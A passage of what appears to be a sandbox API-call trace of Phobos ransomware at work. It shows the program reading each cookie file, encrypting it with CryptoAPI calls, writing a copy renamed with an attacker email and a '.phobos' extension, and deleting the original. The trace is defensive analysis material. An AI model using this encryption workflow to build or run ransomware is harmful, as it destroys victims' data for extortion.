WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0194.300] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.300] CloseHandle (hObject=0x180) returned 1 [0194.300] CloseHandle (hObject=0x14c) returned 1 [0194.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt")) returned 1 [0194.301] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.302] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0194.302] CloseHandle (hObject=0x14c) returned 1 [0194.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt")) returned 0x2020 [0194.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.303] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.303] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0194.304] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0194.304] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0194.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.304] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.304] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0194.305] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.305] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0194.305] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.305] CloseHandle (hObject=0x14c) returned 1 [0194.305] CloseHandle (hObject=0x180) returned 1 [0194.305] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt")) returned 1 [0194.306] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.307] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=108) returned 1 [0194.307] CloseHandle (hObject=0x180) returned 1 [0194.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt")) returned 0x2020 [0194.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.307] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.307] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.308] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.308] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6c, lpOverlapped=0x0) returned 1 [0194.309] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.309] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x70, lpOverlapped=0x0) returned 1 [0194.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.310] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.310] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0194.310] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.310] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0194.310] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.310] CloseHandle (hObject=0x180) returned 1 [0194.310] CloseHandle (hObject=0x14c) returned 1 [0194.310] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt")) returned 1 [0194.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.311] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=104) returned 1 [0194.311] CloseHandle (hObject=0x14c) returned 1 [0194.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt")) returned 0x2020 [0194.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.312] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.312] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x68, lpOverlapped=0x0) returned 1 [0194.313] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.313] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x70, lpOverlapped=0x0) returned 1 [0194.314] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.314] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.314] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.314] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.314] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.314] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.314] CloseHandle (hObject=0x14c) returned 1 [0194.314] CloseHandle (hObject=0x180) returned 1 [0194.314] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt")) returned 1 [0194.315] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.316] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=178) returned 1 [0194.316] CloseHandle (hObject=0x180) returned 1 [0194.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt")) returned 0x2020 [0194.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.316] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.316] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.637] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.637] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.637] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb2, lpOverlapped=0x0) returned 1 [0194.638] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0194.638] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0194.639] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0194.639] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.639] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0194.639] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.639] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0194.639] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.639] CloseHandle (hObject=0x180) returned 1 [0194.639] CloseHandle (hObject=0x154) returned 1 [0194.639] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt")) returned 1 [0194.640] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.641] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=215) returned 1 [0194.641] CloseHandle (hObject=0x154) returned 1 [0194.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt")) returned 0x2020 [0194.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.641] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.641] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 